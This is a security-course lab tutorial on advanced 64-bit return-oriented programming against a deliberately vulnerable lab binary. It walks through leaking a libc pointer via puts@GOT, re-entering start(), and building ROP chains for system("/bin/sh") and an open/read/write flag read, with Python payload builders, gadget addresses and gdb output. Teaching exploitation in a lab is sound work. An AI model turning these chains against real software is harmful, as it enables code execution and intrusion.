Tut06: Advanced ROP

In the last tutorial, we used code and stack pointers freely leaked by the binary in our control-hijacking attacks. In this tutorial, we'll exploit the same program again, but this time without any a-priori information leaks, and also in x86_64 (64-bit).

Step 0. Understanding the binary

$ checksec ./target
[*] '/home/lab06/tut06-advrop/target'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

As before, DEP (NX) is enabled, so pages not explicitly marked as executable will not be executable. PIE is also not enabled, which means that the target executable's base address will not be randomized by ASLR (but note that libraries, the heap, and stack addresses will still be randomized). There's also no canary, meaning we can smash the stack and immediately start hijacking control flow.

[Task] Your first task is to trigger a buffer overflow and control rip.

You can control rip with the following payload:

[ buf ]
[ ... ]
[ ra  ] -> func
[dummy]
[ ... ] -> arg?
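The layout above can be sketched in plain Python. This is only a minimal illustration: the distance from buf to the saved return address (`OFFSET_TO_RA`) is a made-up placeholder that you need to measure yourself (for example with a cyclic pattern in gdb), and `0xdeadbeef` is just an easily recognizable dummy target.

```python
import struct

# ASSUMPTION: distance in bytes from the start of buf to the saved return
# address. 40 is a placeholder, not a value taken from the target binary.
OFFSET_TO_RA = 40

def p64(value):
    """Pack an integer as an 8-byte little-endian word."""
    return struct.pack("<Q", value)

def hijack_payload(target):
    # Filler up to the return address, then the value we want loaded into rip.
    return b"A" * OFFSET_TO_RA + p64(target)

payload = hijack_payload(0xDEADBEEF)  # dummy target, easy to spot in a crash
print(payload.hex())
```

If the offset is right, the crash reported by gdb should show rip holding the dummy value.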

Step 1. Controlling arguments in x86_64

In 32-bit x86, we could control the invoked function's arguments by writing them to the stack. This no longer works in x86_64, as parameters are now conventionally passed using registers. For example, the first argument to a function will be read from rdi, instead of from somewhere on the stack.

In the last tutorial, we only used the pop; ret gadget to clean up the stack, but it can also be used to control registers. For example, by executing pop rdi; ret, you can set the rdi register to a controlled value from the stack.

Let's control the argument to puts() with the following payload:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ]
[ ra  ] -> puts()
[ ra  ]

Since our binary is not PIE-enabled, we can search for gadgets in its code.

Looking for pop

First, let's look for the pop gadget:

$ ropper --file ./target --search "pop rdi; ret"
...
[INFO] File: ./target
0x00000000004008d3: pop rdi; ret;

Looking for puts()

Next we need the address of puts(). puts() lives in libc, and since libc has a randomized base address due to ASLR, we can't predict its address. How can we solve this?

While it's true that we can't call the actual implementation of puts() in libc directly, we can invoke it indirectly, through the resolved address stored in the program's GOT.

Do you remember how the program invoked external functions through the PLT/GOT, like this?

0x0000000000400600 <puts@plt>:
+--0x400600: jmp    QWORD PTR [rip+0x200a12]  # GOT of puts()
|
| (first time)
+->0x400606: push   0x0                       # index of puts()
|  0x40060b: jmp    0x4005f0 <.plt>           # resolve libc's puts()
|
| (once resolved)
+--> puts() @libc

0x0000000000400767 <start>:
   ...
   400776: call   0x400600 <puts@plt>

The PLT and GOT are part of the target binary, so their addresses are constant. We can therefore invoke puts() by jumping into the PLT code corresponding to it.

pwndbg also provides an easy way to look up PLT routines in the binary:

pwndbg> plt
0x400600: puts@plt
0x400610: printf@plt
0x400620: memset@plt
0x400630: geteuid@plt
0x400640: read@plt
0x400650: strcmp@plt
0x400660: setreuid@plt
0x400670: setvbuf@plt

[Task] Your next task is to trigger a buffer overflow and print out "Password OK :)"! This is our arbitrary-read primitive.

Your payload should look like this:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> "Password OK :)"
[ ra  ] -> puts@plt
[ ra  ] (crashing)
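A minimal sketch of this chain in Python follows. The gadget and PLT addresses come from the ropper and pwndbg output above; `OFFSET_TO_RA` and `STR_ADDR` are hypothetical placeholders that you have to look up in the binary yourself.

```python
import struct

POP_RDI_RET = 0x4008D3  # from the ropper output above
PUTS_PLT = 0x400600     # from the pwndbg `plt` listing above

# ASSUMPTIONS (placeholders, not taken from the binary):
OFFSET_TO_RA = 40       # distance from buf to the saved return address
STR_ADDR = 0x400900     # address of the "Password OK :)" string

def call1(func, arg):
    """ROP fragment for func(arg): pop arg into rdi, then return into func."""
    return struct.pack("<3Q", POP_RDI_RET, arg, func)

payload = b"A" * OFFSET_TO_RA + call1(PUTS_PLT, STR_ADDR)
print(len(payload))
```

Nothing follows puts@plt in the chain, so the process is expected to crash once puts() returns, as in the diagram.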

Step 2. Leaking libc's code pointer

Although the process image has lots of interesting functions in its PLT/GOT that we can abuse, it's missing the truly powerful functions like system() that allow for arbitrary code execution. To invoke arbitrary libc functions, we'll first need to leak a code pointer into libc.

Which part of the process image contains libc pointers? The GOT! After all, the goal of puts@plt (below) is to act as a bridge between the binary and puts@libc, by reading the latter's real address from the GOT and jumping to it:

0x0000000000400600 <puts@plt>:
   0x400600: jmp    QWORD PTR [rip+0x200a12] # GOT of puts()

What's the address of puts@GOT? It's rip + 0x200a12, so... 0x400606 + 0x200a12 = 0x601018. (We use 0x400606 because rip always points to the next instruction, and that jmp instruction is six bytes long.)
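The same arithmetic, written out as a small Python check (all three numbers are taken from the disassembly above):

```python
JMP_ADDR = 0x400600  # address of the jmp instruction in puts@plt
JMP_LEN = 6          # the rip-relative jmp is six bytes long
DISP = 0x200A12      # displacement encoded in the instruction

next_rip = JMP_ADDR + JMP_LEN  # rip already points past the jmp
puts_got = next_rip + DISP

print(hex(next_rip), hex(puts_got))  # 0x400606 0x601018
```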

pwndbg provides a convenient way to look up entries in the binary's GOT, as well:

pwndbg> got

GOT protection: Partial RELRO | GOT functions: 10

[0x601018] puts@GLIBC_2.2.5 -> 0x7ffff7a64a30 (puts) ◂— push   r13
[0x601020] printf@GLIBC_2.2.5 -> 0x7ffff7a48f00 (printf) ◂— sub    rsp, 0xd8
...

So the address of libc's puts() can be found in the target's GOT, specifically at 0x601018. Separately, as we found earlier, we also have the ability to call puts() through its PLT entry. Since puts() can be thought of as printing memory from whatever pointer you provide to it, we can use it to read and print puts()'s address value from the GOT -- even though that's not actually a string.

To do that, your payload should look like this:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> puts@got
[ ra  ] -> puts@plt
[ ra  ] (crashing)

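Note that puts() might not output all 8 bytes of the address (64-bit pointer), since puts() stops at the first null byte. On x86_64, the top two bytes of a user-space address are typically zero, so you will usually receive only the low six bytes (followed by the newline that puts() appends), and fewer if one of the lower bytes happens to be zero.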
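Turning the received bytes back into a pointer could look like the sketch below. The sample bytes correspond to the puts address in the gdb session above; `PUTS_OFFSET` is an assumption chosen only to make the example concrete, so look up the real offset in the libc you are targeting.

```python
import struct

# ASSUMPTION: offset of puts() inside the target's libc. Placeholder value;
# obtain the real one from your libc (readelf, gdb, pwntools, ...).
PUTS_OFFSET = 0x80A30

def parse_leak(raw):
    """Convert the bytes printed by puts() into a 64-bit integer."""
    if raw.endswith(b"\n"):
        raw = raw[:-1]              # drop the newline appended by puts()
    padded = raw.ljust(8, b"\x00")  # restore the zero bytes puts() skipped
    return struct.unpack("<Q", padded)[0]

leaked_puts = parse_leak(b"\x30\x4a\xa6\xf7\xff\x7f\n")
libc_base = leaked_puts - PUTS_OFFSET

print(hex(leaked_puts), hex(libc_base))
# Sanity check: a correct libc base is page-aligned.
assert libc_base & 0xFFF == 0
```

If the page-alignment check fails, either the offset is wrong or the leak was truncated by a zero byte.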

[Task] Leak the address of libc's puts()!

Step 3. Preparing the second payload

So now what? We can calculate libc's base address from the leaked pointer to puts(), so can we now invoke any function in libc? Perhaps like this:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> puts@got
[ ra  ] -> puts@plt

[ ra  ] -> pop rdi; ret
[arg1 ] -> "/bin/sh"@libc
[ ra  ] -> system()@libc
[ ra  ] (crashing)

Unfortunately, it's not quite that easy. When you're preparing the payload, you don't yet know the address of libc, since the code that will eventually leak puts@got has not yet been executed.

Of all the places we know, is there anywhere we can jump to that lets us keep interacting with the process, so we can send additional ROP input? Yes, the start() function! Let's execute start() a second time and smash the stack once more, this time armed with knowledge of libc's base address.

[Task] Jump to start(), which has the stack overflow, a second time. Make sure that you see the program banner twice!

payload1:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> puts@got
[ ra  ] -> puts@plt

[ ra  ] -> start
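As a rough sketch, payload1 can be assembled like this. All four addresses appear earlier in this tutorial; only `OFFSET_TO_RA` is a hypothetical placeholder.

```python
import struct

POP_RDI_RET = 0x4008D3  # ropper output
PUTS_PLT = 0x400600     # pwndbg `plt`
PUTS_GOT = 0x601018     # pwndbg `got`
START = 0x400767        # address of start() from the disassembly

# ASSUMPTION: placeholder distance from buf to the saved return address.
OFFSET_TO_RA = 40

# puts(puts@got) leaks the libc pointer, then start() runs again.
chain1 = [POP_RDI_RET, PUTS_GOT, PUTS_PLT, START]
payload1 = b"A" * OFFSET_TO_RA + struct.pack("<4Q", *chain1)
print(payload1[OFFSET_TO_RA:].hex())
```

After sending it, you would read the leaked bytes, expect the banner again, and only then build the second payload.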

The program is now executing the vulnerable start() once more, and waiting for your input. It's time to ROP again, to invoke system() with the resolved addresses.

[Task] Invoke system("/bin/sh")!

payload2:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> "/bin/sh"
[ ra  ] -> system@libc
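One possible way to build payload2 once the libc base is known is sketched below. The helper name `build_payload2` and every number passed to it are illustrative assumptions; the real offsets of system() and "/bin/sh" depend on the libc in use.

```python
import struct

POP_RDI_RET = 0x4008D3  # from the ropper output earlier

# ASSUMPTION: placeholder distance from buf to the saved return address.
OFFSET_TO_RA = 40

def build_payload2(libc_base, system_off, binsh_off):
    """system("/bin/sh") chain, with both addresses computed from libc_base."""
    chain = [POP_RDI_RET, libc_base + binsh_off, libc_base + system_off]
    return b"A" * OFFSET_TO_RA + struct.pack("<3Q", *chain)

# Hypothetical example values, shown only to demonstrate the call.
EXAMPLE_BASE = 0x7FFFF79E4000
EXAMPLE_SYSTEM_OFF = 0x45000
EXAMPLE_BINSH_OFF = 0x1A0000
payload2 = build_payload2(EXAMPLE_BASE, EXAMPLE_SYSTEM_OFF, EXAMPLE_BINSH_OFF)
print(payload2[OFFSET_TO_RA:].hex())
```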

Step 4. Advanced ROP: Chaining multiple functions!

Similar to the last tutorial, we'll invoke a sequence of calls in order to read the flag from target-seccomp.

  1. open("anystring", 0); (assume that "anystring" names a symlink to /proc/flag)
  2. read(3, tmp, 1040);
  3. write(1, tmp, 1040);

Invoking open()

As we discussed earlier, we can control the first argument of a function call in x86_64 by popping a value into rdi. To control the second argument, we need an equivalent gadget for rsi.

$ ropper --file ./target --search 'pop rsi; ret'
<... nope ...>

Unfortunately, the target binary doesn't have pop rsi; ret. But there is another gadget that works just as well, as long as we put a dummy value on the stack for the extra pop:

$ ropper --file ./target --search 'pop rsi; pop %; ret'
...
0x00000000004008d1: pop rsi; pop r15; ret;

With that, invoking open() is pretty doable:

payload2:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> "anystring"

[ ra  ] -> pop rsi; pop r15; ret
[arg2 ] -> 0
[dummy] (r15)

[ ra  ] -> open()

Invoking read()

To invoke read(), we'll need one more gadget to control its third argument: pop rdx; ret. Unfortunately, the target binary doesn't have any suitable gadgets for that.

What should we do? Actually, at this point, since we know the address of libc, we can use additional ROP gadgets from there, too!

$ ldd target-seccomp
    linux-vdso.so.1 (0x00007ffe65f89000)
    libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007fd118f39000)
    libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd118b48000)
    /lib64/ld-linux-x86-64.so.2 (0x00007fd119159000)
$ ropper --file /lib/x86_64-linux-gnu/libc.so.6 --search 'pop rdx; ret'
0x0000000000001b96: pop rdx; ret;
...

Your secondary payload should now look like this:

payload2:

[ buf ]
[ ... ]
[ ra  ] -> pop rdi; ret
[arg1 ] -> 3

[ ra  ] -> pop rsi; pop r15; ret
[arg2 ] -> tmp
[dummy] (r15)

[ ra  ] -> pop rdx; ret
[arg3 ] -> 1040

[ ra  ] -> read()
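A three-argument call like this can be wrapped in a small helper, sketched here in Python. The two gadgets in the binary and the pop rdx; ret offset come from the ropper output above; the helper name `call3` and the example values for the libc base, read() address, and tmp buffer are placeholders.

```python
import struct

POP_RDI_RET = 0x4008D3      # in the target binary
POP_RSI_R15_RET = 0x4008D1  # in the target binary
POP_RDX_RET_OFF = 0x1B96    # offset inside libc, per the ropper output

def call3(libc_base, func, a1, a2, a3):
    """ROP fragment for func(a1, a2, a3) using the three gadgets above."""
    chain = [
        POP_RDI_RET, a1,
        POP_RSI_R15_RET, a2, 0,          # the 0 is the dummy popped into r15
        libc_base + POP_RDX_RET_OFF, a3,
        func,
    ]
    return struct.pack("<%dQ" % len(chain), *chain)

# ASSUMPTIONS: example values only; use your leaked base and real addresses.
libc_base = 0x7FFFF79E4000
read_addr = libc_base + 0x110000  # hypothetical address of read()
tmp = 0x601800                    # hypothetical writable scratch buffer

read_chain = call3(libc_base, read_addr, 3, tmp, 1040)
print(len(read_chain))  # 64
```

Fragments built this way can be concatenated, so the same helper could serve for the open() and write() calls as well.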

[Task] Your final task is to chain open()/read()/write() and get the real flag from target-seccomp!

What if either PIE or SSP (stack canary) were enabled? Do you think we could still exploit this vulnerability?

Tips on handling stack alignment issues

When returning to libc functions in a 64-bit binary through a ROP chain, you can encounter a situation where the program segfaults on a "movaps" or "stosq" instruction in functions like buffered_vfprintf() or do_system(), as shown in the core dump below:

$ gdb-pwndbg ./target-seccomp core
Reading symbols from ./target-seccomp...
Program terminated with signal SIGSEGV, Segmentation fault.
...
 RBP  0x7ffe05c19d58 -> 0x7ffe05c19e68 <- 'BBBBBBBB\n'
 RSP  0x7ffe05c17678 -> 0x7ffe05c17759 <- 0x0
 RIP  0x7f5a4e17c75e <- 0x848948502444290f
----------------------------------------[ DISASM ]-----------------------------------------
 > 0x7f5a4e17c75e    movaps xmmword ptr [rsp + 0x50], xmm0
   0x7f5a4e17c763    mov    qword ptr [rsp + 0x108], rax
   0x7f5a4e17c76b    call   0x7f5a4e179490 <0x7f5a4e179490>

This is because some of the 64-bit libc functions require your stack to be 16-byte aligned -- that is, the address in rsp must end with a "0" when they are called. Below, you can see that this constraint has been violated, as the address in rsp ends with an "8":

*RSP  0x7fffc4cb3bb8 -> 0x400767 (start) <- push   rbp
*RIP  0x7f6636241140 (read) <- lea    rax, [rip + 0x2e0891]
----------------------------------------[ DISASM ]-----------------------------------------
   0x4008d4       <__libc_csu_init+100>    ret
    V
   0x7f6636234d69 <_getopt_internal+89>    pop    rdx
   0x7f6636234d6a <_getopt_internal+90>    pop    rcx
   0x7f6636234d6b <_getopt_internal+91>    pop    rbx
   0x7f6636234d6c <_getopt_internal+92>    ret
    V
 > 0x7f6636241140 <read>                   lea    rax, [rip + 0x2e0891] <0x7f66365219d8>
   0x7f6636241147 <read+7>                 mov    eax, dword ptr [rax]
   0x7f6636241149 <read+9>                 test   eax, eax
   0x7f663624114b <read+11>                jne    read+32 <read+32>

Since rsp is not 16-byte aligned, when we continue, the program ends up segfaulting on the aforementioned movaps instruction.

How can we deal with this situation? That is, how can we adjust our data on the stack to be properly aligned?

The simple solution is to add an extra ret to the beginning of your ROP chain. When ret is invoked, it increments rsp by 8 (you already know why!). Thus, you can simply add a dummy ret to make rsp 16-byte aligned.

There are many ret instructions in the binary. You can pick any of them and add it to your ROP chain. If you already have the address of a pop rdi; ret gadget, you can just add 1 to get the address of ret, since pop rdi is a one-byte instruction.

For example, the payload shown in Step 4 can be revised to:

payload2:

[ buf ]
[ ... ]
[ ra  ] -> ret           // dummy return is added to align the stack!
[ ra  ] -> pop rdi; ret  // followed by your original rop chain
[arg1 ] -> 3

[ ra  ] -> pop rsi; pop r15; ret
[arg2 ] -> tmp
[dummy] (r15)

[ ra  ] -> pop rdx; ret
[arg3 ] -> 1040

[ ra  ] -> read()

We can verify in GDB that the dummy ret was added to the ROP chain (right after the end of start()):

 > 0x4007eb <start+132>              ret             <0x4008d4; __libc_csu_init+100>
    V
   0x4008d4 <__libc_csu_init+100>    ret  // THIS IS THE ADDED RET
    V
   0x4008d3 <__libc_csu_init+99>     pop    rdi
   0x4008d4 <__libc_csu_init+100>    ret

As a result, when returning into read(), rsp now ends with a "0" (16-byte aligned):

*RSP  0x7ffe49f96c60 -> 0x400767 (start) <- push   rbp
*RIP  0x7f4bc3bc5140 (read) <- lea    rax, [rip + 0x2e0891]
----------------------------------------[ DISASM ]-----------------------------------------
   0x4008d4       <__libc_csu_init+100>    ret
    V
   0x7f4bc3bb8d69 <_getopt_internal+89>    pop    rdx
   0x7f4bc3bb8d6a <_getopt_internal+90>    pop    rcx
   0x7f4bc3bb8d6b <_getopt_internal+91>    pop    rbx
   0x7f4bc3bb8d6c <_getopt_internal+92>    ret
    V
 > 0x7f4bc3bc5140 <read>                   lea    rax, [rip + 0x2e0891] <0x7f4bc3ea59d8>
   0x7f4bc3bc5147 <read+7>                 mov    eax, dword ptr [rax]
   0x7f4bc3bc5149 <read+9>                 test   eax, eax
   0x7f4bc3bc514b <read+11>                jne    read+32 <read+32>
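The alignment fix can be summarized in a few lines of Python. The two rsp values are the ones from the gdb dumps in this section; the helper names are illustrative only.

```python
import struct

POP_RDI_RET = 0x4008D3
RET = POP_RDI_RET + 1  # skip the one-byte `pop rdi` to land on the bare `ret`

def is_16_byte_aligned(rsp):
    return rsp % 16 == 0

def with_alignment_ret(chain):
    """Prepend one dummy ret, shifting rsp by 8 for everything after it."""
    return struct.pack("<Q", RET) + chain

print(hex(RET))                            # 0x4008d4
print(is_16_byte_aligned(0x7FFFC4CB3BB8))  # False (crashing run)
print(is_16_byte_aligned(0x7FFE49F96C60))  # True  (run with the extra ret)
```

Whether the extra ret is needed depends on the length of your chain, so it is worth checking rsp in gdb rather than adding it blindly.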

Tips on ifuncs

When finding the offset of a function like memcpy() in your libc library (not needed for this tutorial, but other challenges in this lab may have you use functions like that), you might notice that there are multiple memcpy()-like functions there. This is due to a mechanism called "indirect functions", or "ifuncs" (see the glibc source code and the gcc documentation), which allows glibc to select the best-optimized version of a function for the hardware capabilities detected at runtime.

$ # note: `readelf` doesn't work here because most of the ifunc symbol
$ # names aren't exported -- but we can still see them with `strings`:
$ strings /lib/x86_64-linux-gnu/libc.so.6 | grep memcpy | grep -v wmem
__memcpy_chk
__memcpy_chk
__memcpy_chk_avx512_unaligned
__memcpy_chk_avx_unaligned
__memcpy_chk_ssse3_back
__memcpy_chk_ssse3
__memcpy_chk_sse2_unaligned
__memcpy_chk_erms
memcpy
__memcpy_avx_unaligned
__memcpy_avx_unaligned_erms
__memcpy_ssse3_back
__memcpy_ssse3
__memcpy_avx512_no_vzeroupper
__memcpy_avx512_unaligned
__memcpy_sse2_unaligned
__memcpy_sse2_unaligned_erms
__memcpy_erms
__memcpy_chk_avx512_no_vzeroupper
__memcpy_chk_avx512_unaligned_erms
__memcpy_chk_avx_unaligned_erms
__memcpy_chk_sse2_unaligned_erms
__memcpy_avx512_unaligned_erms

Unfortunately, this tends to confuse GDB and pwntools, and they can report incorrect addresses for such functions. A reliable way to determine the right address is with a simple C program like this (compile with -m32 for 32-bit or -m64 for 64-bit):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef long long unsigned int llui_t;

// Before compiling, find `printf()`'s libc offset through some other
// means (readelf, gdb, pwntools, etc), and put it below:
#define PRINTF_OFFSET 0x000513a0

int main() {
  uintptr_t libc = (uintptr_t)printf - PRINTF_OFFSET;
  printf("libc:   %#llx\n", (llui_t)libc);

  if (libc & 0xfff) {
    printf("libc address looks wrong! Please double-check `PRINTF_OFFSET`.\n");
    return 1;
  }

  printf("memcpy: %#llx\n", (llui_t)((uintptr_t)memcpy - libc));
  printf("memset: %#llx\n", (llui_t)((uintptr_t)memset - libc));
  printf("strcmp: %#llx\n", (llui_t)((uintptr_t)strcmp - libc));
  return 0;
}

For a longer list of ifuncs in libc, try readelf -a [/.../libc.so.6] | grep IFUNC. Roughly speaking, most of them are "mem" and "str" functions.

Reference